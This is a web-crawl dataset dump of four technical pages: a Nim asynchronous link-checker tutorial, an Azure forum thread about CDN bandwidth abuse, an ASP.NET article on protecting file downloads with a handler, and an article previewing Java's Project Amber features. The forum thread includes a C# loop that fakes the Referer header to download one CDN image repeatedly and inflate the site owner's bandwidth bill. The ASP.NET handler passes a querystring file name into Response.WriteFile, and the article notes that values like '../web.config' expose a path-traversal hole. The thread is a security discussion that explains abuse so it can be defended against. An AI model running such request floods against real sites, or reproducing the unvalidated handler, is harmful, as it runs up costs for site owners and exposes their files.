text
stringlengths
454
608k
url
stringlengths
17
896
dump
stringclasses
91 values
source
stringclasses
1 value
word_count
int64
101
114k
flesch_reading_ease
float64
50
104
Day 4: LinksChecker What to expect ? We will be writing a simple linkschecker in both sequential and asynchronous style in nim Implementation Step 0: Imports import os, httpclient import strutils import times import asyncdispatch Step 1: Data types type LinkCheckResult = ref object link: string state: bool LinkCheckResult is a simple representation for a link and its state Step 2: GO Sequential! proc checkLink(link: string) : LinkCheckResult = var client = newHttpClient() try: return LinkCheckResult(link:link, state:client.get(link).code == Http200) except: return LinkCheckResult(link:link, state:false) Here, we have a proc checkLink takes a link and returns LinkCheckResult newHttpClient()to create a new client client.getto send a get request to a link and it returns a response response.codegives us the HTTP status code, and we consider a link is valid if its status == 200 client.getraises error for invalid structured links that's why we wrapped it a try/exceptblock proc sequentialLinksChecker(links: seq[string]): void = for index, link in links: if link.strip() != "": let result = checkLink(link) echo result.link, " is ", result.state Here, sequentialLinksChecker proc takes sequence of links and executes checkLink on them sequentially LINKS: @["", "", "", "", "", ""] SEQUENTIAL:: is true is true is true is false is true 7.716497898101807 On my lousy internet it took 7.7 seconds to finish :( Step 3: GO ASYNC! We can do better than waiting on IO requests to finish proc checkLinkAsync(link: string): Future[LinkCheckResult] {.async.} = var client = newAsyncHttpClient() let future = client.get(link) yield future if future.failed: return LinkCheckResult(link:link, state:false) else: let resp = future.read() return LinkCheckResult(link:link, state: resp.code == Http200) Here, we define a checkLinkAsync proc - to declare a proc as async we use asyncpragma - notice the client is of type newAsyncHttpClientthat doesn't block on .getcalls client.getreturns immediately a future that can either fail, and we can infer know that from future.failedor succeed yield futuremeans okay i'm done for now dear event loopyou can schedule other tasks and continue my execution when you have more update on my fancy futurewhen the eventloop comes back because the future now has some updates - clearly, if the futurefailed we return the link with a falsestate - otherwise, we get the responseobject that's enclosed in the future by calling read proc asyncLinksChecker(links: seq[string]) {.async.} = # client.maxRedirects = 0 var futures = newSeq[Future[LinkCheckResult]]() for index, link in links: if link.strip() != "": futures.add(checkLinkAsync(link)) # waitFor -> call async proc from sync proc, await -> call async proc from async proc let done = await all(futures) for x in done: echo x.link, " is ", x.state Here, we have another async procedure asyncLinksChecker that will take a sequence of links and create futures for all of them and wait when they finish and give us some results futuresis a sequence for the future results of all the LinkCheckResultsfor all the links passed to asyncLinksCheckerproc - we loop on the links and get futurefor the execution of checkLinkAsyncand add it to the futuressequence. - we now ask to force to block until we get all of the results out of the futures into donevariable - then we print all the results - Please notice awaitis used only to call asyncproc from another asyncproc, and waitForis used to call asyncproc from syncproc ASYNC:: is true is true is true is false is true is false 3.601503849029541 Step 4 simple cli proc main()= echo "Param count: ", paramCount() if paramCount() == 1: let linksfile = paramStr(1) var f = open(linksfile, fmRead) let links = readAll(f).splitLines() echo "LINKS: " & $links echo "SEQUENTIAL:: " var t = epochTime() sequentialLinksChecker(links) echo epochTime()-t echo "ASYNC:: " t = epochTime() waitFor asyncLinksChecker(links) echo epochTime()-t else: echo "Please provide linksfile" main() the only interesting part is waitFor asyncLinksChecker(links) as we said to call async proc from sync proc like this main proc you will need to use waitFor Extra, threading import threadpool proc checkLinkParallel(link: string) : LinkCheckResult {.thread.} = var client = newHttpClient() try: return LinkCheckResult(link:link, state:client.get(link).code == Http200) except: return LinkCheckResult(link:link, state:false) Same as before, only thread pragma i used to note that proc will be executed within a thread proc threadsLinksChecker(links: seq[string]): void = var LinkCheckResults = newSeq[FlowVar[LinkCheckResult]]() for index, link in links: LinkCheckResults.add(spawn checkLinkParallel(link)) for x in LinkCheckResults: let res = ^x echo res.link, " is ", res.state - spawned tasksor threadsreturns a value of type FlowVar[T], where Tis the return value of the spawned proc - To get the value of a FlowVarwe use ^operator. Note: you should use nim.cfgwith flags -d:sslto allow working with https
https://xmonader.github.io/nimdays/day04_asynclinkschecker.html
CC-MAIN-2019-51
refinedweb
766
59.64
Asked by: Azure CDN bandwidth abuse by malicious bandwidth vampire requests Question Hello, So here's the situation. Let's say that I am building a picture gallery website and I would like to use Azure CDN to deliver my content for me. In the backend, Azure CDN will pull content from an Azure storage account. CDN is fast and powerful, but it seems though it can be a little unsecured in terms of preventing someone from being able to pull content in very large quantities and thus leaving a user with a huge bandwidth bill. Let me demonstrate what I mean. So last night I decided to write a simple console app that would download a simple image from my future to be picture gallery website, in a for loop, the code is below: namespace RefererSpoofer { class Program { static void Main(string[] args) { HttpWebRequest myHttpWebRequest = null; HttpWebResponse myHttpWebResponse = null; for (int x = 0; x < 1000; x++) { string myUri = ""; myHttpWebRequest = (HttpWebRequest) WebRequest.Create(myUri); myHttpWebRequest.Referer = ""; myHttpWebResponse = (HttpWebResponse) myHttpWebRequest.GetResponse(); Stream response = myHttpWebResponse.GetResponseStream(); StreamReader streamReader = new StreamReader(response); Image image = Image.FromStream(streamReader.BaseStream); image.Save(string.Format("D:\\Downloads\\image{0}.Jpeg", x), ImageFormat.Jpeg); myHttpWebResponse.Close(); } Console.ReadKey(); } } } This console application makes 1000 super-fast continuous requests to an image file that is hosted on my Azure CDN endpoint, and saves them to 'D:\Downloads' folder on my PC, with each filename corresponding to the for{} loop iteration, i.e. image1.jpeg, image2.jpeg, etc. So what just happened? In about 1 minute of time, I have cost myself 140MB of bandwidth. With this being a Premium CDN, priced at $0.17/GB, let's do the math together: 0.14GB * 60minutes * 24hours * 30days * 0.17cents/GB = $1028.16 of bandwidth costs just if someone (a competitor for example) wanted to make a single request for a single image for a duration of the month to jeopardize my website. I think you guys can see where I am going with this...my website will have thousands of images, in hi-res, btw, the image that I was using in this example was a mere 140KB in size. These types of requests can come from anonymous proxies, etc. So the question that I have is: How can Azure protect a customer against such abuse? Obviously the customer can't be stuck paying $5,000, $20,000 for bandwidth resulting from malicious requests. Now Azure Premium CDN has an advanced Rules Engine, that can filter out requests based on Refer, and respond with a 403 error in case the Refer doesn't match your website. But, the Refer can be faked, as I did in the above code sample, and CDN still allows the requests to be served, I tested with a Refer spoof. This sucks, a lot of people use Refer to prevent 'hotlinking', but what does it matter if it can be faked with just a line of code? A couple of ideas that I've had in regards to prevent such abuse and huge bandwidth cost for customers: 1. When a request comes for content to the CDN, CDN could make a call to the client server passing in a) IP address of the user b) the CDN Uri requested. And then the client server would check how many times this Uri was requested from this particular IP, and if the client logic sees that it was requested let's say 100 times over the past minute, then obviously this would signal abuse, because browsers cache images, while malicious requests don't. So the client machine would simply reply 'false' to serving the content for this particular request. This would not be a perfect solution since the additional callback to client infrastructure would cause a small delay, yet it's definitely better than being potentially stuck with a bill that looks like the amount of money you have saved up in your savings account. 2. A better solution. Built in a limit for number of times a file can be served over CDN within a particular time frame, per ip. For example, in the example of the image file above, if one could configure the CDN to serve no more than let's say 50 image requests / IP / within 10 minute time frame. If the abuse was detected, then CDN could, for a time defined by a customer a) serve a 403 for a particular abused uri. or b) server 403 for all uri's if the request is coming from an abuser IP. All times / options should be left configurable to the customer. This would definitely help. There's no callback here which saves time. The downside is that CDN will have to keep track of Uri/IP address/ Hit count. Which solutions would NOT work: 1. Signed URL's won't work because the signature query string parameter would be different every time and browsers would constantly make requests for data, effectively wiping out browser cache for images. 2. Having a SAS access signature for blob would not work either because a) Uri is different every time b) There's no limit on how many times you can request a blob once SAS is granted. So abuse scenario is still possible. 3. Check your logs and simply ban by IP. I was testing this type of abuse via anonymous proxy yesterday and it worked like a charm. Switched IPs in a matter of seconds and continued abuse (of my own content) for testing purposes. So this is out as well, unless you have a nanny to monitor your logs. Solutions that can work, but are not feasible: 1. Filter requests on your web server. Sure, this would be the best way to control the issue and track the number of requests / IP, and simply not serve the content when abuse is detected. But then you loose humongous for not delivering your content over super-fast, proximity-to-client optimized CDN. Besides the fact that your servers will be slowed down a lot by serving out large byte content such as images. 3. Simply bite the bullet and not worry about it. Well...then you know that the pothole that will take your wheel out is just down the road, so no, it's not a comfortable feeling. By the way, let's say that this does happen to a client, how would Azure handle such an issue? Would Azure give a full refund for such abuse if customer can prove that this was indeed what's happened? would Azure give a partial refund? or any refund amount at all? With all of the above said, the Premium CDN offering from Azure with custom Rules Engine might offer a solution somewhere in there, but with a very poor documentation and a lack of examples one only would have to guess how to properly protect yourself, so that's why I am writing this post. As far as I know there's also a WAF security rule set coming for Azure CDN, could anyone comment around what time frame it is planned to come out? and would it have any features to detect & deflect the scenario described in this post? I would appreciate if this would also be brought to the Azure CDN developers attention so that a) maybe they can comment and b) build the countermeasures once they are aware of the issue Any suggestions are appreciated, I am very open minded on the issue. Thank you for reading.Thursday, February 18, 2016 5:38 PM All replies Thanks for your very thorough and detailed feedback. Overall the most secure and controlled solution is one where you require authentication for each request. When content is made publicly accessible to everyone, one is exposed to risk of large bandwidth usage as a result of either a malicious attack on ones site or just because a sites content became very popular. The CDN is designed to handle massive and fast usage spikes worldwide. This inherently adds additional risk for customers versus directly using an origin such as Azure Storage which doesn't have the same scale capabilities. There are a few solutions to consider some that are available now and others that we are working on providing later this year. Solutions available now: 1. You can set a spending limit on your Azure account to limit impact of large bandwidth usage - see for additional details on this. 2. If you don't expect to have large # of requests for your content (e.g. 100's of concurrent requests) consider not using Azure CDN and just having your customers directly access content from your origin. Overall Azure CDN is optimized for large concurrent requests for content. If you have a lot of long tail static content that isn't accessed frequently in many cases you will have better performance with requests going directly to your origin. Solutions that will be available later this year: 1. Token authentication capabilities via the Premium SKU. Token authentication will allow one to require that specific or all requests must be authenticated. An encrypted token must be provided by clients and defines minimum requirements that must be met - e.g. client IP, allowed/denied countries, expiration time for token, allowed hosts, allowed referrers, etc. 2. Real time alerts via the Premium SKU. Real time alerts will allow you to receive notification either via email or HTTP POST when specific thresholds have been reached - e.g. bandwidth, # of requests, HTTP errors, etc. 3. Full CDN WAF offering. This may be the ideal solution for you as it will allow one to define legitimate / illegitimate traffic via threat detection measures, Access controls (e.g. IP address, country, etc.), and global settings. You will have the ability to either generate alerts or automatically block threats - e.g. throttle bandwidth.Sunday, February 28, 2016 10:51 AM Hi Anton, Thank you for you reply. I was just about to post this on CDN feedback forum, but I've noticed you replied here. So my thoughts after reading your reply are below: In regards to the points you have mentioned for the options that are available now: 1. The spending limit seems more like of the last line of defense for the account. While we surely will be having that, it's not exactly how we would want to prevent someone from just sucking up the bandwidth if they wanted to (and us having to pay that bill). Also once the limit is reached it looks like it would shut down the services, this can't happen in production environment. 2. That's was one of the solutions I described that would not be feasible, having to serve images from web servers directly will probably kill the web servers. Having to serve images out of dedicated servers would likely double the hosting costs and maintenance costs for the customer. In regards to the options that would be available later this year: 1. Are these singed URLs? I don't think these would work because they would wipe out the browser's possibility to cache the images. How could a browser cache the image if the uri is always different with a unique token parameter at the end of it? 2. Certainly receiving alerts could be an option if the bandwidth goes through the roof. But one has to realize that banning simply by IP in that case is ineffective, anonymous proxies could swap IPs in seconds, I have tested this scenario. Everything else about the request can be faked, including headers, referrer, browser version, etc. I spoofed referrer in the code that I have provided above, and azure CDN was no longer blocking these requests with a 403 error. So the alerts are somewhat useless unless you really can do something about what's happening. 3. Sounds a little more interesting, specifically the bandwidth throttling feature. But how would it be configured? What really needs to happen is the ability for CDN to limit number of requests from a particular IP, for a particular CDN uri, for a particular time frame. So an attacker for example can't request a particular image file / video file, from their IP, more than X times, in Y time frame. Would WAF be able to do that? I looked into Amazon's WAF but didn't see anything. Looking at what's been done with WAF now, it only seems to provide a very basic functionality against attacks, because it's just so easy to fake anything about the request programmatically, one would be busy just maintaining the rules all the time. What this all really feels like is having a door made out of cardboard on your house that gives you a false sense of security, it's really a joke, that's what it is. Btw, right now it takes about 3 hours for the rule to kick-in with the Premium SKU..but customers need response in seconds or minutes in the worst case scenario. We need a better product that can handle non-standard scenarios, not just "typical" cases, something that can hold its ground in advanced cases as well. With the scenario that I am describing here, it's so obvious to one that a scenario like this can happen (and probably happens all the time) when your content is exposed publicly. As a customer, let me tell you, we love the speed of CDN but we also want our security. This really shouldn't be that hard to do and can be implemented with a dictionary look ups that are O(1) in efficiency in the CDN back-end. I am sharing this because this really does matter, and is a real issue, and no one has stepped up to this yet. Files are larges nowadays, bandwidth is expensive, hackers are merciless, and competition is stiff. We need solutions to address such issues.Tuesday, March 1, 2016 6:44 PM I find it really hard to justify the use of the CDN now that I realized the problem with malicious scenarios such as the ones AzureCloudDev pointed out. Who can really afford to take the risk of infinite size bill for the very likely scenario of malicious behaviour? Having spending limit for sure removes the possibility of infinite bill. However it doesn't sound like very dynamic solution when shit hits the fan. Maybe some of the upcoming features Anton mentioned will help with the problem. However with the new features managing the CDN might become everything but easy, making it no-go option for smaller teams and startups. So there might not be any single obvious solution for the problem. I am wondering how many developers are taking the risk of using the CDN without really understanding how vulnerable their bill really is. The CDN is expected to be the public user facing interface, contrary to for example Azure Storage which is mainly used to build secure backends.Sunday, March 20, 2016 11:34 PM
https://social.msdn.microsoft.com/Forums/en-US/9e37ca24-b38d-4193-847b-f679eab76aa5/azure-cdn-bandwidth-abuse-by-malicious-bandwidth-vampire-requests?forum=azurecdn
CC-MAIN-2021-31
refinedweb
2,510
61.46
Let's start by examining the problem is a little more detail first. Forms Authentication in ASP.NET only works with requests that are handled by ASP.NET in IIS 6.0 (typically Windows Server 2003), which means that non-ASP.NET content bypasses aspnet.dll, and is not subject to it. Let's say you have a folder within your application called Private. You set up Forms Authentication to protect this folder, such as in the following web.config snippet: <system.web> <authentication mode="Forms"> <forms loginUrl="Private/Login.aspx" defaultUrl="Private/Default.aspx"> <credentials passwordFormat="Clear"> <user name="mike" password="test" /> </credentials> </forms> </authentication> </system.web> <location path="Private"> <system.web> <authorization> <deny users="?" /> </authorization> </system.web> </location> The URL to your Private folder is. Any requests for that URL will invoke the default document, which in this case is Private/Default.aspx. Since that has been protected under Forms Authentication, and since all .aspx files are mapped to aspnet.dll, Forms Authentication kicks in and users who have not already logged in will be redirected to Private/Login.aspx. Login.aspx contains a straightforward Login Control: <form id="form1" runat="server"> <div> <asp:Login </div> </form> And the code-behind contains the authentication logic: protected void Login1_Authenticate(object sender, AuthenticateEventArgs e) { string username = Login1.UserName; string password = Login1.Password; if(FormsAuthentication.Authenticate(username, password)) { FormsAuthentication.RedirectFromLoginPage(username, false); } } Users who successfully authenticate will be directed to Default.aspx, which contains links to downloadable files: <form id="form1" runat="server"> <div> <a href="HelloWorld.txt">Click Here to Get File</a> </div> </form> This seems to work, but if a non-authenticated user just enters into their browser, the file will be served, as ASP.NET is not configured to handle .txt files. As I mentioned before, the vast majority of articles on this topic show how to map .txt to aspnet.dll within IIS, create an HttpHandler to manage the file access, and then register that handler within the web.config file. If you do not have access to IIS, there is a simple workaround. The first thing to do is to move all download files to a location where they cannot be browsed. Ideally, your web hosting company will have provided you with access to at least one folder above the root folder of your application. This is ideal, because no one can browse that folder since it is not part of the application itself. However, if you only have access to the root folder and its contents, there is still at least one other option - App_Data. Anything placed in App_Data is protected by ASP.NET, and requests for items within it are met with a 403 - Forbidden error message. Once you have moved your files, you need a means to serve them to authenticated users, and an HttpHandler will do the job easily. Just go to Add... New Item, and select Generic Handler. You should be met with a new file with a .ashx extension containing code like this: public class MyFileHandler : IHttpHandler { public void ProcessRequest(HttpContext context) { context.Response.ContentType = "text/plain"; context.Response.Write("Hello World"); } public bool IsReusable { get { return false; } } } The Handler contains two methods - ProcessRequest and IsReusable. The first houses the logic that needs to be run to process the current request, and the second dictates whether the handler can be pooled and reused for other requests. For the sake of simplicity, the default value of false can be left as it is. The point about the handler, created from the Generic Handler option with its .ashx extension is that it is already mapped to aspnet.dll, so it can take part in Forms Authentication. Not only that, but it does not need to be registered within the web.config file. Now its simply a matter of adding some logic to validate the user, and retrieve the file they are after: public class MyFileHandler : IHttpHandler { public void ProcessRequest(HttpContext context) { if (context.User.Identity.IsAuthenticated) { string filename = context.Request.QueryString["File"]; //Validate the file name and make sure it is one that the user may access context.Response.Buffer = true; context.Response.Clear(); context.Response.AddHeader("content-disposition", "attachment; filename=" + filename); context.Response.ContentType = "application/octet-stream"; context.Response.WriteFile("~/App_Data/" + filename); } } public bool IsReusable { get { return false; } } } This is really simple. After establishing whether the current user is authenticated, the handler checks the querystring for a filename. At that point it is important to validate the filename, to make sure that it is one that the user can have access to. It is possible for a user to alter the querystring to point to folders above App_Data, such as the root directory, and request web.config by passing ../web.config into the querystring. This will throw an exception on most servers, as the ../ notation for parent paths is disabled by default. However, as a couple of commentators have mentioned below, this is not always the case. Then the method simply uses Response.WriteFile() to deliver the file. I have set the ContentType of the file to application/octet-stream, and the content-disposition to attachment above, which will cover any type of file and always force a Save or Open dialogue box. You may prefer to check the file extension and set the ContentType accordingly. You may also want to add some error checking logic to ensure that a querystring value has been passed, that the file exists etc. However, if you are not using FormsAuthentication out of the box, you may be checking a session variable on each page to see if the user is logged in instead. This being the case, you need to know that HttpHandlers do not have access to session state by default, so references to session variables will fail. One change is all that is required, and that is to make your HttpHandler implement IReadOnlySessionState (or IRequiresSessionState if you want to modify session variables). The HttpContext object that is passed in to the ProcessRequest() method provides access to session variables through its Session property. public class MyFileHandler : IHttpHandler, IReadOnlySessionState { .... That just leaves one question - how does the file name get into the querystring? Going back to Private/Default.aspx, we simply amend the link to point to the handler instead: <form id="form1" runat="server"> <div> <a href="MyFileHandler.ashx?File=HelloWorld.txt">Click Here to Get File</a> </div> </form> There we have it Simple authentication checks made before delivering files, without having to register the handler in the web.config file, or mess about with IIS settings. If you are being hosted on a server that runs IIS 7.0, things are a lot easier. With its new Integrated Pipeline model, a simple change to your application's web.config file will ensure that all content within your application is always handled by ASP.NET, so that non-ASP.NET content can take part in ASP.NET Forms Authentication. This article details how to make that change.
https://www.mikesdotnetting.com/article/122/simple-file-download-protection-with-asp-net
CC-MAIN-2020-05
refinedweb
1,166
50.73
> -----Original Message----- > From: Rutger Hofman [mailto:rutger@cs.vu.nl] > An incremental build should come with sophisticated dependency > analysis. For this, there is <depend>. However, in my experience > doing "ant depend build" is not at all necessarily faster than > "ant clean build". > > So, an incremental build is only faster without "ant depend", but > then the programmer should be very aware of overlooked dependencies. > > > From: Jan.Materne@rzf.fin-nrw.de: > > But my opinion is > > - do a incremental build during development (includes unit tests) > > - (sometimes a clean build during development :-) > > - do a clean build before system test and release > > > > > From: Travis Kline [mailto:traviskline1977@hotmail.com] > > > I wanted to get the board's consensus on the clean build > > > vs partial build debate. I have read in more than one source > > > that it is a "goodpractice" to always perform a clean build. > > > Why? If you are caching your destination directory when compiling, > > > besides speed, is thereany other benefit? > > > What are you doing in your build? I've seen too major pitfalls developers around me have fallen into with incremental builds: 1) Removed/renamed resources (.properties, .gif) in the source tree, not removed from the classes tree by an incremental build. 2) Removed/renamed Java sources, not removed from the classes tree by an incremental build. I now have a solution for both I think, to be rolled out to all my problem soon: For (1), instead of doing a <copy> of the resources into build/classes/, I'll now <lsync> them into build/resources/, with <lsync> in a strict mode where files in both src and dest trees must be absolutely equals (CVS can play tricks with dates, so checking file sizes and even sums might be necessary. For (2), I've developed a selector that parses a class file to identify which Java source it came from, to remove "orphan" class files. Since the class parser is very specialized to just get that info, it's rather quick, but I'm also looking at caching options. /** * An Ant file selector that matches class files * which have no corresponding Java source file. * <p> * Note that class files compiled without debug information (specifically * the SourceFile attribute of the class file) will be ignored by this * selector. * .../... */ public class OrphanClassFileSelector extends BaseExtendSelector { .../... } With these two solutions, it should avoid most mistakes I've seen from inexperienced developers (people with other expertise, also doing development), while not putting too much a delay on incremental builds. I might not use these on large projects for example. I'll add two things: 1) Setup CruiseControl (or equivalent) build of all your projects, so you can catch early these kind of errors. The CC build does a clean build of course! 2) Most experienced developers usually feel when a fully rebuild is necessary, and when things start behaving strangely, do a full rebuild before wasting time in a wild goose chase. Cheers, --DD --------------------------------------------------------------------- To unsubscribe, e-mail: user-unsubscribe@ant.apache.org For additional commands, e-mail: user-help@ant.apache.org
http://mail-archives.apache.org/mod_mbox/ant-user/200309.mbox/%3CD44A54C298394F4E967EC8538B1E00F10248C85A@lgchexch002.lgc.com%3E
CC-MAIN-2013-48
refinedweb
504
61.56
I'm setting up a model for a project and everything works as expected, except for the change below. I thought it'd be neat to specify the type as Type string namespace DataBase.Entities { public class Lock { public Guid Id { get; set; } public DateTime? Occasion { get; set; } public int Counter { get; set; } public Type Entity { get; set; } //public string Entity { get; set; } } } System.ArgumentNullException: Value cannot be null. Parameter name: entitySet I would always store the assembly-qualified type name instead of the type itself. A Type instance it's not just a name, but a lot of metadata that may be interesting during run-time, but it would be pointless to store (i.e. serialize) a type instance as is. When you set the whole Type property get Type.AssemblyQualifiedName property value: instance.Type = typeof(X).AssemblyQualifiedName; And the code that should work with the whole type could call Type.GetType(lock.Type) to build a Type instance again.
https://codedump.io/share/f5FwAULXnOtQ/1/why-can39t-i-have-property-of-type-type-in-my-model-for-entity-framework
CC-MAIN-2016-44
refinedweb
161
59.09
How Project Amber Will Revolutionize JavaBy Nicolai Parlog Table of Contents This is the editorial for the SitePoint Java Channel newsletter that we send out every other Friday. Subscribe here! Earlier this week Brian Goetz, Java Language Architect at Oracle, officially announced Project Amber and I could not be more excited about it! It will continue what Java 8 began and make Java a much less verbose and even more fun language. Type inference, massively simplified data classes, pattern matching, … all of this has been bubbling up in recent months but it is great to see it put on official tracks. (While this might be new to Java, non-Java devs might scoff and look down on us with comments like, “we’ve been using that for ten years, now.” Well, good for you but no reason to rain on our parade so stfu!) Revolutionary Fighters I’m sure you can’t wait to see those improvements I promised, so let’s do that first. Once we’ve explored them I will spend a few words on Project Amber and release date speculations. (If you’re interested to see how these proposals and value types might play together, have a look at What Future Java Might Look Like). Local Variable Type Inference Java has done type inference since Java 5 (for type witnesses in generic methods) and the mechanism was extended in Java 7 (diamond operator), 8 (lambda parameter types), and 9 (diamond on anonymous classes). Under Project Amber it is planned to be extended to type declarations of local (!) variables: //. For more information, have a look at JEP 286. Enhanced Enums As it stands, enums can not be generic, meaning you can not give individual enum instances fields of specific types: // now public enum FavoriteNumber { INTEGER(42), FLOAT(3.14); // wouldn't it be nice if this were more specific than Number? public final Number favorite; FavoriteNumber(Number favorite) { this.favorite = favorite; } } Project Amber considers to let enums have type parameters: // maybe in the future public class FavoriteNumber<T extends Number> { INTEGER<Interger>(42), FLOAT<Float>(3.14); // wouldn't it be nice if this were more specific than Number? public final T favorite; FavoriteNumber(T favorite) { this.favorite = favorite; } } And the great thing is, the compiler will perform sharp type checking and know which generic types a specific enum instance has: // maybe in the future float favorite = FavoriteNumber.FLOAT.favorite; For more information, have a look at JEP 301. Lambda Leftovers Great name, eh? These are a couple of smaller improvements to lambda expressions and method references. The first is that the compiler will be better at picking the target for a lambda expression or method reference in situations where it has to pick one of several overloads: // now; compile error: "ambiguous method call" method(s -> false) private void method(Predicate<String> p) { /* ... */ } private void method(Function<String, String> f) { /* ... */ } It is weird that the compiler thinks this is ambiguous because to us it very much isn’t. When lambda leftovers are implemented, the compiler agrees. Java 8 deprecated _ as variable name and disallowed it as a lambda parameter name. Java 9 will disallow using it as variable names as well so it is free to get a special meaning, namely to mark unused lambda parameters (yes, more than one in the same expression): // maybe in the future // ignore the parameter marked as `_` BiFunction<Integer, String, String> f3 = (i, _) -> String.valueOf(i); // if there were a TriFunction: BiFunction<Integer, String, String, String> f3 = (i, _, _) -> String.valueOf(i); Finally, Project Amber explores the possibility to let lambda parameters shadow variables in the enclosing scope. This would make naming them a little easier because as it stands it can be a little onerous: private Map<String, Integer> wordLengthCache; // now public int computeLength(String word) { // can't reuse `word` in lambda, so... maybe `w`? wordLengthCache.computeIfAbsent(word, w -> w.length()); } // maybe in the future public int computeLength(String word) { // can't reuse `word` in lambda, so... maybe `w`? wordLengthCache.computeIfAbsent(word, word -> word.length()); } For more information, have a look at JEP 302. Data Classes We’ve all created plenty of simple data holder classes that needed dozens of lines of code for fields, constructor, accessors, equals, hashCode, toString.! // maybe in the future! (There is no JEP for this proposal yet but Amber will adopt it as soon as it is.). Project Amber explores what is commonly known as pattern matching. It works over all types, can have conditions that are more complex than equality checks, and is an expression, meaning it results in a value that can be assigned. Here’s an example Brian showed at Devoxx Belgium a few months ago: // maybe in the future String formatted = switch (constant) { case Integer i -> String.format("int %d", i); case Byte b: //... case Long l: // ... // ... default: formatted = "unknown" } (There is no JEP for this proposal yet but Amber will adopt it as soon as it is.) More from this author Project Amber Now that we know which features are currently being explored as part of Project Amber, it is time to take a closer look at the project itself. In the welcome mail it is described is an “incubation ground for selected productivity-oriented Java language JEPs.” Loosely said, its scope is defined as whatever JEP the expert group finds interesting and aligns with the overall mission statement: To be considered for adoption by Project Amber, a feature should first be described by a JEP. This means that this is not the place for discussing random language feature ideas (the whole rest of the internet is still available for that); let’s keep the focus on the specific features that have been adopted. Read that mail to get links to JEPs, mailing lists, and the repo. Release Date A natural question to have is, when will the project be shipped? When can you start writing that awesome code I keep promising? The most responsible answer is that nobody knows. Leaving responsibility aside, we can speculate a little. Project Lambda, which brought lambda expressions and streams, took a little more than four years from inception in December 2009 to its debuting release in March 2014. Project Jigsaw, notorious for its delays, started a year earlier, in December 2008, and is only being shipped now, making it take almost nine years. Keep in mind, though, that Oracle bought Sun in 2010 and I can only assume that engineering efforts were adversely affected by the transition. Also, it seems to me that both projects are considerably more complex and monolithic than Amber (although both is hard to judge from the outside). Project Amber is more of a roof for various changes that move the language into a common direction but might not have to be shipped at once to make sense. Under this assumption and guessing the project’s development time based on Lambda and Jigsaw, it seems plausible that some changes will make it into Java 10. Before you ask: Nobody knows when 10 will be out! Again some speculation, back in 2012 Mark Reinhold, Chief Architect of the Java Platform Group, proposed a two-year release cycle that due to delays became more of a three-year cycle. Extrapolating the future from two data points (luckily I am not bound to scientific standards here), 2020 looks like a good guess. Keep in mind, though, that Project Valhalla started in July 2014 and took on the massive undertaking to implement generic specialization and value types. It is not targeted for any release yet but it looks like it’s in the time frame to go into 10. If so, it could very well delay the release due to its complexity. So bottom line is: Nobody knows. If I had to bet money I would put it on 2020. Fingers crossed. About That Name… Oh yeah, why is it called Project Amber? Because it’s shiny? Because it preserves dead things? I don’t know. Instead of spending needless cycles thinking about it I opted to ask Brian himself but he was either very secretive or very open: — Brian Goetz (@BrianGoetz) March 17, 2017 He made a proposal, though, that we come up with an explanation, so why not? @nipafx Tell you what. Have a contest to come up with candidates. I'll put real answer in envelope. Then we'll compare best answer to ours! — Brian Goetz (@BrianGoetz) March 17, 2017 So here’s the deal: You leave a comment or tweet (don’t forget to mention me) with your explanation why it might be called Project Amber and I will let Brian and his team choose the one they like best (deadline: March 26th). To make this a real competition, the winner gets a copy of my upcoming book about the Java 9 module system. So what do you think? Why Amber? Two weeks later… Submissions Thank you everybody for your participation. Your ideas: @java @BrianGoetz @nipafx It's an alternate Java universe that has been quarantined in amber (Fringe style). — Branko Juric (@warpedjavaguy) March 28, 2017 @java @BrianGoetz @nipafx Because it's kind of a digestive system that will allow cool ideas to ferment into cool features ? — Kwakeroni (@kwakeroni) March 28, 2017 @java @BrianGoetz @nipafx Or more probable: amber was called elektron in Greek, which might mean "beaming Sun" (according to Wikipedia) — Kwakeroni (@kwakeroni) March 28, 2017 @nipafx @sitepointdotcom bc amber is highly conductive (and revered in ancient times) and anything purportedly "revolutionary" is conductive — Emma Lam 🤓 (@emmolam) March 22, 2017 @nipafx @BrianGoetz 1st comes to mind is Jurassic Park. Dunno but this article shows the name Amber in Ancient times — Carl Dea (@carldea) March 18, 2017 @nipafx amber: "because it will make your sticky opaque codebase lean and transparent" :P #java — Nicky Mølholm (@moelholm) March 18, 2017 @nipafx @BrianGoetz wonder of Brian likes Colombian Amber coffee — Zoran Regvart (@zregvart) March 18, 2017 @BrianGoetz @nipafx fancy way to say we should be electrified? amber in Greek is elektron and is related to triboelectric effect? 🙂 my2cent — Luca Guadagnini (@lucaguada) March 17, 2017 Every time people mention “Amber” I remember this part of Jurasic Park haha, maybe all this new features are coming from the DNA of old programmers but with fresh ideas. (Juan Moreno) Project Coin -> Milling project coin -> While we’ve got our hands rummaging around in the treasure chest we also happen to find a semi precious stone -> Amber (Andreas Aronsson) Amber simply contains all that we wanted for that project: First astonishment to catch your interest, then momentum to keep you going, brilliance shining everywhere, encouraging you not only to evolute but to revolutionize your code. (matameko) We didn’t want Java to become fossilized, but we also want the features we’re adding to make the language dazzle again! (Jim Bethancourt) I guess they just had name contest and there’s no logic behind it. Nice. Shiny. Short. No problems with other cultures and languages. (Jukka Nikki) It could be also name of daughter of project lead. (Jukka Nikki) And The Winner is… … Kwakeroni (hand-picked by Brian Goetz himself) with: @java @BrianGoetz @nipafx Or more probable: amber was called elektron in Greek, which might mean "beaming Sun" (according to Wikipedia) — Kwakeroni (@kwakeroni) March 28, 2017 Congratulations! 😀 On your great detective skills as well as the price. While the explanation is definitely intriguing, Brian has another one: @nipafx Our inspiration was from the Zelazny "Amber" books, in which "walking the Pattern" was a central theme. — Brian Goetz (@BrianGoetz) April 2, 2017 So now we know why the project revolutionizing Java is called Amber…. - Jukka Nikki - Nicolai Parlog - Jukka Nikki - P.K. Hunter - Norbert Kiesel - Nicolai Parlog - Andreas Aronsson - Andreas Aronsson - Jim Bethancourt - Marcin Moskala - matameko - Bill - Jonathan Fisher
https://www.sitepoint.com/project-amber-will-revolutionize-java/?utm_source=sitepoint&utm_medium=articletile&utm_campaign=likes&utm_term=java
CC-MAIN-2017-22
refinedweb
1,965
60.14
